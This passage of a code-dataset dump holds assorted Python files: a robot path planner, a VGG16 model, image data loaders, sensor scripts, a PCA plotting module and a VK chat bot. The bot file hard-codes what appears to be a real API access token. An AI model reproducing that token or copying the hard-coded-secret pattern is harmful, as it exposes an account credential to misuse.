([[dt*math.cos(theta), dt*math.sin(theta), 0, 1, 0],\n [0 , 0 , dt, 0, 1]])\n return B_T\n\n# 変数群\n## 状態ベクトルにかかる行列\nA = [\n [1, 0, 0, 0, 0],\n [0, 1, 0, 0, 0],\n [0, 0, 1, 0, 0],\n [0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0]\n]\n\n# クラス群\n\n## シミュレーション用ロボットモデル\nclass SimRobotModel():\n ### コンストラクタ\n def __init__(self):\n #### 速度に関する制限\n self.max_vel = 1.4\n self.min_vel = 0.0\n self.max_acc = 9.0\n\n #### 回転速度に関する制限\n self.max_ang_vel = 60 * math.pi/180\n self.min_ang_vel = -60 * math.pi/180\n self.max_ang_acc = 120 * math.pi/180\n\n ### 取りうる状態ベクトルの計算\n def predict_status(self, u, status, dt, pre_step):\n next_status = []\n\n for i in range(pre_step):\n B_T = calc_B_T(dt, status[2])\n status = list(\n np.dot(status, A) + np.dot(u, B_T)\n )\n next_status.append(status)\n return next_status\n\n## Dynamic Window Approachのコントローラ\nclass DWA():\n ### コンストラクタ\n def __init__(self):\n #### モデル呼び出し\n self.simbot = SimRobotModel()\n\n #### 分解能\n self.delta_vel = 0.1\n self.delta_ang_vel = math.pi/180\n\n #### シミュレーションの時間、間隔およびステップの宣言\n self.pre_time = 2\n self.samp_time = 0.1\n self.pre_step = int(self.pre_time/self.samp_time)\n\n ### 取りうる入力の組み合わせ全探索\n def _calc_u_set(self, status):\n calc_max_vel = self.simbot.max_acc*self.samp_time\n calc_max_ang_vel = self.simbot.max_ang_acc*self.samp_time\n v_set = np.arange(\n max(\n status[3]-calc_max_vel,\n self.simbot.min_vel\n ),\n min(\n status[3]+calc_max_vel,\n self.simbot.max_vel\n ),\n self.delta_vel\n )\n o_set = np.arange(\n max(\n status[4]-calc_max_ang_vel,\n self.simbot.min_ang_vel\n ),\n min(\n status[4]+calc_max_ang_vel,\n self.simbot.max_ang_vel\n ),\n 
self.delta_ang_vel\n )\n return v_set, o_set\n\n ### 取りうる経路の計算\n def make_path(self, status):\n v_set, o_set = self._calc_u_set(status)\n paths = []\n\n for vel in v_set:\n for ang_vel in o_set:\n path = self.simbot.predict_status([vel, ang_vel], status, self.samp_time, self.pre_step)\n paths.append(path)\n\n return paths\n\ndef main(status):\n dwa_sim = DWA()\n paths = dwa_sim.make_path(status)\n \n return paths\n \nif __name__ == '__main__':\n start = time.time()\n status = main()\n finished = time.time() -start\n print(\"{0}\".format(finished) + \"[sec]\")\n print(status)","sub_path":"lib/.ipynb_checkpoints/makepath-checkpoint.py","file_name":"makepath-checkpoint.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130957296","text":"import ConfigParser\nimport logging\n\nclass Config:\n def __init__(self, configFile):\n self.Config = ConfigParser.ConfigParser()\n self.Config.read(configFile)\n logging.info(self.Config.sections())\n\n def ConfigSectionMap(self, section):\n dict1 = {}\n options = self.Config.options(section)\n for option in options:\n try:\n dict1[option] = self.Config.get(section, option)\n if dict1[option] == -1:\n logger.debug(\"skip: %s\" % option)\n except:\n logging.error(\"exception on %s!\" % option)\n dict1[option] = None\n return dict1\n","sub_path":"src/generate_snapshot_data/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221745241","text":"from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nimport numpy as np\nimport os\n\nDIR = os.path.dirname(__file__)\n\nTRAIN_IMAGE_PATH = os.path.join(DIR, \"../dataset/training_data/train/\")\nTEST_IMAGE_PATH = os.path.join(DIR, \"../dataset/training_data/test_data/\")\nNUMPY_PATH = os.path.join(DIR, \"../dataset/training_data/npydata/\")\n\nIMAGE_PATH = TRAIN_IMAGE_PATH + \"img/\"\nLABEL_PATH = TRAIN_IMAGE_PATH + \"label/\"\n\n\nclass dataProcess(object):\n \"\"\"\n A class used to prepare data for train and test\n It will first store images in form of numpy array\n Then, it will help the main program to load the numpy array for training\n \"\"\"\n\n def __init__(self, width, height, data_path=IMAGE_PATH, label_path=LABEL_PATH, npy_path=NUMPY_PATH,\n test_path=TEST_IMAGE_PATH,\n img_type=\".jpg\"):\n self.width = width\n self.height = height\n self.data_path = data_path\n self.label_path = label_path\n self.img_type = img_type\n self.test_path = test_path\n self.npy_path = npy_path\n\n def createTrainData(self):\n i = 0\n print(\"-\" * 30)\n print(\"Creating train images...\")\n print(\"-\" * 30)\n\n imgs = os.listdir(self.data_path)\n imgs = [img for img in imgs if img.endswith(self.img_type)]\n print(len(imgs))\n # Create numpy array to store all data\n images_train = np.ndarray((len(imgs), self.width, self.height, 1), dtype=np.uint8)\n labels_train = np.ndarray((len(imgs), self.width, self.height, 1), dtype=np.uint8)\n # Loop over all images\n for img in imgs:\n # Load image and label\n image = load_img(self.data_path + img, target_size=(self.width, self.height), grayscale=True)\n label = load_img(self.label_path + img, target_size=(self.width, self.height), grayscale=True)\n # Transform image and label to arrays\n image = img_to_array(image)\n label = img_to_array(label)\n # Store image and label arrays in numpy array\n images_train[i] = image\n 
labels_train[i] = label\n i += 1\n print(\"Done {0}/{1} images\".format(i, len(imgs)))\n print(\"Loading done.\")\n np.save(self.npy_path + \"images_train.npy\", images_train)\n np.save(self.npy_path + \"labels_train.npy\", labels_train)\n print(\"Saving data to .npy files done.\")\n\n def createTestData(self):\n i = 0\n print(\"-\" * 30)\n print(\"Creating test images...\")\n print(\"-\" * 30)\n\n imgs = os.listdir(self.test_path)\n imgs = sorted([img for img in imgs if img.endswith(self.img_type)])\n print(len(imgs))\n # Create numpy array to store all data\n images_test = np.ndarray((len(imgs), self.width, self.height, 1), dtype=np.uint8)\n images_info = np.ndarray((len(imgs), 3))\n\n # Loop over all images\n for img in imgs:\n # Load image\n ori_image = load_img(self.test_path + img)\n width, height = ori_image.width, ori_image.height\n image = load_img(self.test_path + img, target_size=(self.width, self.height), grayscale=True)\n # Transform image to arrays\n image = img_to_array(image)\n # Store image array in numpy array\n images_test[i] = image\n images_info[i] = (int(img[:-4]), width, height)\n i += 1\n print(\"Done {0}/{1} images\".format(i, len(imgs)))\n print(\"Loading done.\")\n np.save(self.npy_path + \"images_test.npy\", images_test)\n np.save(self.npy_path + \"images_info.npy\", images_info)\n print(\"Saving data to .npy files done.\")\n\n def loadTrainData(self):\n print(\"-\" * 30)\n print(\"Load train images...\")\n print(\"-\" * 30)\n # Load numpy files\n images_train = np.load(self.npy_path + \"images_train.npy\")\n labels_train = np.load(self.npy_path + \"labels_train.npy\")\n # Prepocess data\n images_train = images_train.astype('float32')\n labels_train = labels_train.astype('float32')\n images_train /= 255\n labels_train /= 255\n labels_train[labels_train > 0.9] = 1\n labels_train[labels_train <= 0.9] = 0\n return images_train, labels_train\n\n def loadTestData(self):\n print(\"-\" * 30)\n print(\"Load test images...\")\n print(\"-\" * 30)\n # Load numpy files\n images_test = np.load(self.npy_path + \"images_test.npy\")\n images_info = np.load(self.npy_path + \"images_info.npy\")\n # Prepocess data\n images_test = images_test.astype('float32')\n images_test /= 255\n return images_test, images_info\n\n\nif __name__ == \"__main__\":\n mydata = dataProcess(512, 512)\n # mydata.loadTrainData()\n # mydata.createTrainData()\n mydata.createTestData()\n","sub_path":"UNet/src/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"199255001","text":"import requests\nimport vk_api\nfrom vk_api.longpoll import VkLongPoll, VkEventType\n\nvk_session = vk_api.VkApi(token='f1dc08e74f4757ddfc8a358c1c676889d18ee81fa22bb5e52ba76ebc02061dc693add7fcb342513f2a686')\n\nGlobal_i = 0\nlongpoll = VkLongPoll(vk_session)\nvk = vk_session.get_api()\nfor event in longpoll.listen():\n if event.type == VkEventType.MESSAGE_NEW and event.to_me and event.text:\n if event.text == 'Начать':\n vk.messages.send(\n user_id=event.user_id,\n message='Привет! 
Я твой персональный бот :)', random_id=Global_i)\n Global_i += 1\n\n elif event.text == 'Привет' or event.text == 'Здрасте' or event.text == 'Здраствуй' or event.text == 'Здорово':\n vk.messages.send(\n user_id=event.user_id,\n message='Привет', random_id=Global_i)\n Global_i += 1\n else: \n event.text = event.text.split() \n if len(event.text) >= 3 and event.text[0].lower() == 'зашифровать': \n word = event.text[1] \n n = int(event.text[2]) \n # assumed intent: encode by shifting every character by n (simple Caesar cipher)\n vk.messages.send(\n user_id=event.user_id,\n message=''.join(chr(ord(c) + n) for c in word), random_id=Global_i) \n Global_i += 1 \n elif len(event.text) >= 3 and event.text[0].lower() == 'расшифровать': \n word = event.text[1] \n n = int(event.text[2]) \n # inverse shift to decode\n vk.messages.send(\n user_id=event.user_id,\n message=''.join(chr(ord(c) - n) for c in word), random_id=Global_i) \n Global_i += 1 \n else:\n vk.messages.send(\n user_id=event.user_id,\n message='Не понял :(', random_id=Global_i)\n Global_i += 1\n","sub_path":"Desktop/KPOK 2019/Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"60300746","text":"#!/usr/bin/python3\n\nfrom argparse import ArgumentParser\nimport re\nimport os.path\nimport sys\nimport os\n\nparser = ArgumentParser()\nparser.add_argument('--config-file', type=str, help='Configuration file (to be documented)', required=True)\nparser.add_argument('--action', type=str, help='Action: \"add\" or \"remove\"', required=True)\nargs = parser.parse_args()\n\nif not args.action in ('add', 'remove'):\n print(\"Action must be 'add' or 'remove'\", file=sys.stderr)\n sys.exit(1)\n\nrex_sensor = re.compile(r'^\\s*I2C\\s+(\\S+)\\s+(\\S+)\\s+(\\S+)\\s*$')\nrex_emptyline = re.compile(r'^\\s*$')\n\nsensorsfile = open(args.config_file)\nfor s in sensorsfile:\n if rex_emptyline.search(s):\n continue\n match = rex_sensor.search(s)\n if match is None:\n print(\"Nix match\", file=sys.stderr)\n sys.exit(1)\n modname, address, adapter = match.group(1), match.group(2), match.group(3)\n if not os.path.exists(adapter):\n print(\"No such adapter: \"+adapter, file=sys.stderr)\n sys.exit(1)\n\n if args.action == 'add':\n with open(adapter + '/new_device', 'w') as new_device:\n new_device.write('%s %s' % (modname, address))\n else:\n with open(adapter + '/delete_device', 'w') as delete_device:\n delete_device.write(address)\n","sub_path":"bin/openheating-sensors.py","file_name":"openheating-sensors.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"373642208","text":"import webbrowser\r\nimport time\r\n\r\n#App/script which reminds the user to take necessary breaks from time to time; here a video song will be played after a certain interval (the time is provided below - make it minimal to check the program) \r\n#interval periods are very minimal for testing purposes\r\n\r\n\r\n# count determines the number of times you need to take a break\r\ncount = 3\r\n\r\nwhile count > 0:\r\n\r\n\t#A certain action (playing a video) will take place every 10 sec since time.sleep(10)\r\n time.sleep(10)\r\n webbrowser.open(\"https://www.youtube.com/watch?v=vNLZAmLqibo\")\r\n count -= 1\r\n","sub_path":"My Attempts/time_4_relax.py","file_name":"time_4_relax.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"577461441","text":"from .Ball import *\nimport pymunk\n\nclass MarbleBall(Ball):\n def __init__(self, center, bouncingFactor = 1):\n marbleMass = 0.05\n marbleRadius = 3\n marbleCenter = center\n \n self.bouncingFactor = bouncingFactor\n\n Ball.__init__(self, marbleMass, marbleRadius, marbleCenter)\n print('Marble Ball is 
created at position ' + str(center) + '.')\n\n def getType(self):\n return \"marbleBall\"\n","sub_path":"chain_reaction/chain_app/library/MarbleBall.py","file_name":"MarbleBall.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"385781142","text":"import os\nimport time\nimport numpy as np\nimport tensorflow as tf\n\n# VGG_MEAN = [123.68, 116.779, 103.939] # [R, G, B]\nVGG_MEAN = [103.939, 116.779, 123.68] # [B, G, R]\nclass VGG16:\n def __init__(self, vgg16_npy_path, prof_type=None, infer=False):\n \"\"\"\n load pre-trained weights from path\n :param vgg16_npy_path: file path of vgg16 pre-trained weights\n \"\"\"\n \n self.infer = infer\n self.gamma_var = []\n\n if prof_type is None:\n self.prof_type = \"all-one\"\n else:\n self.prof_type = prof_type\n\n # load pre-trained weights\n # if vgg16_npy_path is not None:\n self.data_dict = np.load(vgg16_npy_path, encoding='latin1').item()\n print(\"npy file loaded\")\n \n # input information\n self.H, self.W, self.C = 32, 32, 3\n self.classes = 10\n \n # operation dictionary\n self.prob_dict = {}\n self.loss_dict = {}\n self.accu_dict = {}\n\n # parameter dictionary\n self.para_dict = {}\n\n def build(self, dp):\n \"\"\"\n load variable from npy to build the VGG\n :param rgb: rgb image [batch, height, width, 3] values scaled [0, 1]\n \"\"\"\n\n # input placeholder\n self.x = tf.placeholder(tf.float32, [None, self.H, self.W, self.C])\n self.y = tf.placeholder(tf.float32, [None, self.classes])\n \n self.dp = dp \n print(\"Will optimize at DP=\", self.dp)\n \n start_time = time.time()\n print(\"build model started\")\n rgb_scaled = self.x * 255.0\n\n # normalize input by VGG_MEAN\n red, green, blue = tf.split(axis=3, num_or_size_splits=3, value=rgb_scaled)\n assert red.get_shape().as_list()[1:] == [self.H, self.W, 1]\n assert green.get_shape().as_list()[1:] == [self.H, self.W, 1]\n assert blue.get_shape().as_list()[1:] == [self.H, self.W, 1]\n self.x = tf.concat(axis=3, values=[\n blue - VGG_MEAN[0],\n green - VGG_MEAN[1],\n red - VGG_MEAN[2],\n ])\n assert self.x.get_shape().as_list()[1:] == [self.H, self.W, self.C]\n \n # declare and initialize the weights of VGG16\n with tf.variable_scope(\"VGG16\"):\n for k, v in sorted(self.data_dict.items()):\n if 'conv' in k and 'gamma' not in k:\n # transfer Convolutional filters trained on ImageNet to our model\n (conv_filter, gamma), conv_bias = self.get_conv_filter(k), self.get_bias(k)\n self.para_dict[k] = [conv_filter, conv_bias]\n self.para_dict[k+\"_gamma\"] = gamma\n self.gamma_var.append(self.para_dict[k+\"_gamma\"])\n\n # (self.conv1_2_W, gamma), self.conv1_2_b = self.get_conv_filter(\"conv1_2\"), self.get_bias(\"conv1_2\")\n # self.para_dict[k] = [conv_filter, conv_bias]\n # self.para_dict[k+\"_gamma\"] = gamma\n # self.gamma_var.append(self.para_dict[k+\"_gamma\"])\n\n # (self.conv2_1_W, gamma), self.conv2_1_b = self.get_conv_filter(\"conv2_1\"), self.get_bias(\"conv2_1\")\n # self.gamma_var.append(gamma)\n\n # (self.conv2_2_W, gamma), self.conv2_2_b = self.get_conv_filter(\"conv2_2\"), self.get_bias(\"conv2_2\")\n # self.gamma_var.append(gamma)\n\n # (self.conv3_1_W, gamma), self.conv3_1_b = self.get_conv_filter(\"conv3_1\"), self.get_bias(\"conv3_1\")\n # self.gamma_var.append(gamma)\n\n # (self.conv3_2_W, gamma), self.conv3_2_b = self.get_conv_filter(\"conv3_2\"), self.get_bias(\"conv3_2\")\n # self.gamma_var.append(gamma)\n\n # (self.conv3_3_W, gamma), self.conv3_3_b = 
self.get_conv_filter(\"conv3_3\"), self.get_bias(\"conv3_3\")\n # self.gamma_var.append(gamma)\n\n # (self.conv4_1_W, gamma), self.conv4_1_b = self.get_conv_filter(\"conv4_1\"), self.get_bias(\"conv4_1\")\n # self.gamma_var.append(gamma)\n\n # (self.conv4_2_W, gamma), self.conv4_2_b = self.get_conv_filter(\"conv4_2\"), self.get_bias(\"conv4_2\")\n # self.gamma_var.append(gamma)\n\n # (self.conv4_3_W, gamma), self.conv4_3_b = self.get_conv_filter(\"conv4_3\"), self.get_bias(\"conv4_3\")\n # self.gamma_var.append(gamma)\n\n # (self.conv5_1_W, gamma), self.conv5_1_b = self.get_conv_filter(\"conv5_1\"), self.get_bias(\"conv5_1\")\n # self.gamma_var.append(gamma)\n\n # (self.conv5_2_W, gamma), self.conv5_2_b = self.get_conv_filter(\"conv5_2\"), self.get_bias(\"conv5_2\")\n # self.gamma_var.append(gamma)\n\n # (self.conv5_3_W, gamma), self.conv5_3_b = self.get_conv_filter(\"conv5_3\"), self.get_bias(\"conv5_3\")\n # self.gamma_var.append(gamma)\n\n # user specified fully connected layers\n # TEMPORARY to 25 for experiment of cutoff \n fc_W = tf.get_variable(name=\"fc_1_W\", shape=(512, 512), initializer=tf.truncated_normal_initializer(mean=0, stddev=0.1), dtype=tf.float32)\n fc_b = tf.get_variable(name=\"fc_1_b\", shape=(512,), initializer=tf.ones_initializer(), dtype=tf.float32)\n self.para_dict['fc_1'] = [fc_W, fc_b]\n\n fc_W = tf.get_variable(name=\"fc_2_W\", shape=(512, 10), initializer=tf.truncated_normal_initializer(mean=0, stddev=0.1), dtype=tf.float32)\n fc_b = tf.get_variable(name=\"fc_2_b\", shape=(10,), initializer=tf.ones_initializer(), dtype=tf.float32)\n self.para_dict['fc_2'] = [fc_W, fc_b]\n\n # create operations at every dot product percentages\n for dp_i in dp:\n with tf.name_scope(str(int(dp_i*100))):\n conv1_1 = self.idp_conv_layer( self.x, \"conv1_1\", dp_i)\n conv1_2 = self.idp_conv_layer(conv1_1, \"conv1_2\", dp_i)\n pool1 = self.max_pool(conv1_2, 'pool1')\n\n conv2_1 = self.idp_conv_layer( pool1, \"conv2_1\", dp_i)\n conv2_2 = self.idp_conv_layer(conv2_1, \"conv2_2\", dp_i)\n pool2 = self.max_pool(conv2_2, 'pool2')\n\n conv3_1 = self.idp_conv_layer( pool2, \"conv3_1\", dp_i)\n conv3_2 = self.idp_conv_layer(conv3_1, \"conv3_2\", dp_i)\n conv3_3 = self.idp_conv_layer(conv3_2, \"conv3_3\", dp_i)\n pool3 = self.max_pool(conv3_3, 'pool3')\n\n conv4_1 = self.idp_conv_layer( pool3, \"conv4_1\", dp_i)\n conv4_2 = self.idp_conv_layer(conv4_1, \"conv4_2\", dp_i)\n conv4_3 = self.idp_conv_layer(conv4_2, \"conv4_3\", dp_i)\n pool4 = self.max_pool(conv4_3, 'pool4')\n\n conv5_1 = self.idp_conv_layer( pool4, \"conv5_1\", dp_i)\n conv5_2 = self.idp_conv_layer(conv5_1, \"conv5_2\", dp_i)\n conv5_3 = self.idp_conv_layer(conv5_2, \"conv5_3\", dp_i)\n pool5 = self.max_pool(conv5_3, 'pool5')\n\n fc_1 = self.fc_layer(pool5, 'fc_1')\n fc_1 = tf.nn.dropout(fc_1, keep_prob=0.5)\n fc_1 = tf.nn.relu(fc_1)\n \n logits = self.fc_layer(fc_1, 'fc_2')\n prob = tf.nn.softmax(logits, name=\"prob\")\n \n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=self.y)\n loss = tf.reduce_mean(cross_entropy)\n accuracy = tf.reduce_mean(tf.cast(tf.equal(x=tf.argmax(logits, 1), y=tf.argmax(self.y, 1)),tf.float32))\n \n self.prob_dict[str(int(dp_i*100))] = prob\n self.loss_dict[str(int(dp_i*100))] = loss\n self.accu_dict[str(int(dp_i*100))] = accuracy\n \n tf.summary.scalar(name=\"accu_at_\"+str(int(dp_i*100)), tensor=accuracy)\n tf.summary.scalar(name=\"loss_at_\"+str(int(dp_i*100)), tensor=loss)\n \n self.summary_op = tf.summary.merge_all()\n print((\"build model finished: %ds\" % 
(time.time() - start_time)))\n\n def avg_pool(self, bottom, name):\n return tf.nn.avg_pool(bottom, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', name=name)\n\n def max_pool(self, bottom, name):\n return tf.nn.max_pool(bottom, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', name=name)\n\n def idp_conv_layer(self, bottom, name, dp):\n with tf.name_scope(name+str(int(dp*100))):\n with tf.variable_scope(\"VGG16\",reuse=True):\n conv_filter = tf.get_variable(name=name+\"_W\")\n conv_biases = tf.get_variable(name=name+\"_b\")\n conv_gamma = tf.get_variable(name=name+\"_gamma\")\n \n H,W,C,O = conv_filter.get_shape().as_list()\n \n # create a mask determined by the dot product percentage\n n1 = int(O * dp)\n n0 = O - n1\n mask = tf.constant(value=np.append(np.ones(n1, dtype='float32'), np.zeros(n0, dtype='float32')), dtype=tf.float32)\n profile = tf.multiply(conv_gamma, mask)\n\n # create a profile coefficient, gamma\n filter_profile = tf.stack([profile for i in range(H*W*C)])\n filter_profile = tf.reshape(filter_profile, shape=(H, W, C, O))\n\n # IDP conv2d output\n conv_filter = tf.multiply(conv_filter, filter_profile)\n conv_biases = tf.multiply(conv_biases, profile)\n \n conv = tf.nn.conv2d(bottom, conv_filter, [1, 1, 1, 1], padding='SAME')\n conv = tf.nn.bias_add(conv, conv_biases)\n relu = tf.nn.relu(conv)\n \n return relu\n\n def fc_layer(self, bottom, name):\n with tf.name_scope(name):\n shape = bottom.get_shape().as_list()\n dim = 1\n for d in shape[1:]:\n dim *= d\n x = tf.reshape(bottom, [-1, dim])\n \n with tf.variable_scope(\"VGG16\",reuse=True):\n weights = tf.get_variable(name=name+\"_W\")\n biases = tf.get_variable(name=name+\"_b\")\n\n # Fully connected layer. Note that the '+' operation automatically broadcasts the biases.\n fc = tf.nn.bias_add(tf.matmul(x, weights), biases)\n return fc\n\n def get_conv_filter(self, name):\n if not self.infer:\n conv_filter = tf.get_variable(initializer=self.data_dict[name][0], name=name+\"_W\")\n else:\n conv_filter = tf.get_variable(shape=self.data_dict[name][0].shape, initializer=tf.truncated_normal_initializer(mean=0, stddev=0.1), name=name+\"_W\", dtype=tf.float32)\n H,W,C,O = conv_filter.get_shape().as_list()\n gamma = tf.get_variable(initializer=self.get_profile(O, self.prof_type), name=name+\"_gamma\", dtype=tf.float32)\n return conv_filter, gamma\n\n def get_bias(self, name):\n if not self.infer:\n return tf.get_variable(initializer=self.data_dict[name][1], name=name+\"_b\")\n else:\n return tf.get_variable(shape=self.data_dict[name][1].shape, initializer=tf.truncated_normal_initializer(mean=0, stddev=0.1), name=name+\"_b\", dtype=tf.float32)\n\n def get_profile(self, C, prof_type):\n def half_exp(n, k=1, dtype='float32'):\n n_ones = int(n/2)\n n_other = n - n_ones\n return np.append(np.ones(n_ones, dtype=dtype), np.exp((1-k)*np.arange(n_other), dtype=dtype))\n if prof_type == \"linear\":\n profile = np.linspace(1.0,0.0, num=C, endpoint=False, dtype='float32')\n elif prof_type == \"all-one\":\n profile = np.ones(C, dtype='float32')\n elif prof_type == \"half-exp\":\n profile = half_exp(C, 2.0)\n elif prof_type == \"harmonic\":\n profile = np.array(1.0/(np.arange(C)+1), dtype='float32')\n else:\n raise ValueError(\"prof_type must be \\\"all-one\\\", \\\"half-exp\\\", \\\"harmonic\\\" or \\\"linear\\\".\")\n return profile\n \n","sub_path":"vgg16.py","file_name":"vgg16.py","file_ext":"py","file_size_in_byte":11863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
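For reference, the incremental-dot-product masking used throughout the vgg16.py entry above boils down to keeping the first `dp` fraction of output channels and weighting them with a profile. A minimal NumPy sketch of that step (the channel count and percentage below are illustrative, not values from the entry):

import numpy as np

O, dp = 8, 0.5  # number of output channels and dot-product percentage
n1 = int(O * dp)  # channels that stay active at this percentage
mask = np.append(np.ones(n1, dtype="float32"), np.zeros(O - n1, dtype="float32"))
gamma = np.linspace(1.0, 0.0, num=O, endpoint=False, dtype="float32")  # the "linear" profile
profile = gamma * mask  # per-channel coefficients applied to the conv filters and biases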
+{"seq_id":"348538735","text":"# main.py\nimport random\nimport ujson\nimport urequests\nimport network\nimport ubinascii\nimport time\nfrom machine import Pin\n\nled = Pin(2, Pin.OUT)\n\n\nclass Module:\n def __init__(self):\n self.wlan = network.WLAN(network.STA_IF)\n self.wlan.active(True)\n\n def getMAC(self):\n mac = ubinascii.hexlify(self.wlan.config('mac'), ':').decode()\n return mac\n\n\nclass Emulator:\n def __init__(self):\n self.api_uri = \"http://192.168.0.2:3001/api\"\n self.now = urequests.get(self.api_uri + '/sync').json()\n\n def sendData(self, data: dict):\n response = urequests.post(\n self.api_uri + '/data',\n headers={'content-type': 'application/json'},\n data=ujson.dumps(data)\n )\n\n return response\n\n def generateData(self):\n self.now = urequests.get(self.api_uri + '/sync').json()\n mod = Module()\n data = {\n \"air_temperature\": random.randrange(20, 40),\n \"air_humidity\": random.randrange(5, 100),\n \"soil_humidity\": random.randint(1000, 4000),\n \"readed_by\": mod.getMAC(),\n \"readed_at\": self.now[\"time\"]\n }\n\n led.on()\n\n resp = self.sendData(data)\n print(resp.json())\n\n led.off()\n\n\nif __name__ == '__main__':\n while True:\n emu = Emulator()\n emu.generateData()\n time.sleep(5)\n","sub_path":"esp/sens-emu/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258317674","text":"# Name: Daniel Yan\n# Date: 2018-07-26\n# Email: daniel.yan@vanderbilt.edu\n#\n# Module for an incremental principal component analysis and saving important\n# results/plots.\n\n# Libaries\nfrom sklearn.decomposition import PCA, IncrementalPCA\nimport numpy as np\nimport matplotlib\n\nmatplotlib.use(\"Agg\") # Avoid display error\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Class Defaults\nN_COMPONENTS = 2 # Number of principal components to keep\nBATCH_SIZE = None # Size of incremental pca batch to control for memory\n# usage. Can be int or None.\n\n\ndef create_ipca(features_df, n_components=N_COMPONENTS, batch_size=BATCH_SIZE):\n \"\"\"Create an incremental pca based on a features matrix and return the\n transformed coordinates\n\n Keyword Arguments:\n features: Array-like object containing the features to do a PCA on.\n\n n_components: Number of dimensions to reduce down to (default\n N_COMPONENTS).\n\n batch_size: Size to use for incremental PCA. Can be integer or None (\n default BATCH_SIZE)\n\n Return:\n Numpy array with coordinates of principal components in columns.\n Column 0 contains component accounting for most variation, column 1\n contains component accounting for second-most, and so on.\n \"\"\"\n # Create the incremental PCA\n ipca = IncrementalPCA(n_components=N_COMPONENTS, batch_size=BATCH_SIZE)\n return ipca.fit_transform(features_df)\n\n\ndef label_coordinates(transformed_coordinates, labels, labels_col_name=\"label\"):\n \"\"\"Labels the transformed coordinates with the correct group.\n\n Keyword Arguments:\n transformed_coordinates: Numpy array (or similar) containing the\n coordinates in the principal components\n\n labels: Array-like object containing labels for the coordinates. 
The\n labels should be in\n the same order as the rows in transformed_coordinates\n\n labels_col_name: String for the name of the column containing the\n labels within the dataframe\n (default = \"label\")\n\n axis: List of integers specifying xmin, xmax, ymin, ymax for axes.\n\n Return: Pandas dataframe with labels inserted as the last column of\n transformed_coordinates\n \"\"\"\n # Convert transformed coordinates to pandas dataframe\n transformed_df = pd.DataFrame(transformed_coordinates)\n\n # Label the transformed data\n transformed_df[labels_col_name] = labels\n\n return transformed_df\n\n\ndef scatterplot_cords(df, file_name, labels_list, colors_list,\n labels_col_name=\"label\", figsize=(20, 20), fontsize=30,\n title=\"\", alpha=0.2, component_x=1, component_y=2,\n x_label=\"\", y_label=\"\", axis=\"auto\"):\n \"\"\"Create a scatter plot for the coordinates with different groups\n labeled by color and saves to file\n\n Keyword Arguments:\n df: Pandas data frame containing transformed coordinates and labels\n as last column\n\n file_name: String name of the directory and file to save to\n\n labels_list: List of labels used to label the data\n\n colors_list: List of colors used for the different labels.\n\n labels_col_name: String for the name of the column containing the\n labels within the dataframe\n (default = \"label\"). Must be same as labels_col_name parameter in\n label_coordinates function.\n\n figsize: Tuple containing height and width of the figure in inches (\n default (20, 20))\n\n fontsize: Integer size of the font for title and legend (default = 30)\n\n title: String title for the plot (default is empty string)\n\n alpha: Alpha level for points on scatter plot (default = 0.2)\n\n component_x: Column number of coordinates to plot on x axis + 1\n (default is 1, corresponding to column 0)\n\n component_y: Column number of coordinates to plot on y-axis + 1\n (default is 1, corresponding to column 0)\n\n x_label: String to label x-axis (default is empty string)\n\n y_label: String to label y-axis (default is empty string)\n\n Return: Axis used for plot\n \"\"\"\n # Plot the pca\n plt.figure(figsize=figsize)\n\n # Create tuples matching labels to colors, and plot points corresponding\n # to each label\n # one label at a time on the scatter plot\n for label, color in zip(labels_list, colors_list):\n # Select rows that correspond to the current label\n rows = df.loc[df.loc[:, labels_col_name] == label]\n # Plot on the points corresponding to the current label on the plot\n # with\n # unique color\n plt.scatter(rows.iloc[:, (component_x - 1)],\n rows.iloc[:, (component_y - 1)], color=color, label=label,\n alpha=alpha)\n\n plt.title(title, fontsize=fontsize)\n plt.legend(fontsize=fontsize)\n plt.xlabel(x_label, fontsize=fontsize)\n plt.ylabel(y_label, fontsize=fontsize)\n plt.axis(axis)\n plt.savefig(file_name)\n # Store the axis to return\n axes = plt.axis()\n plt.close()\n return axes\n\n\ndef save_variances(pca, file_name):\n \"\"\"\n Save variances for components of PCA to file.\n :param pca: Scikit learn PCA object that contains variances to save.\n :param file_name: Name of file, including directory and extension,\n to save variances to.\n :return: None\n \"\"\"\n with open(file_name, mode=\"w+\") as file:\n count = 1\n sum = 0\n # Save the explained variance for each individual component\n for i in pca.explained_variance_ratio_:\n file.write(\n \"Explained Variance Ratio for Component {}: {}%\\n\".format(count,\n i *\n 100))\n count += 1\n sum += i * 100\n # Save the 
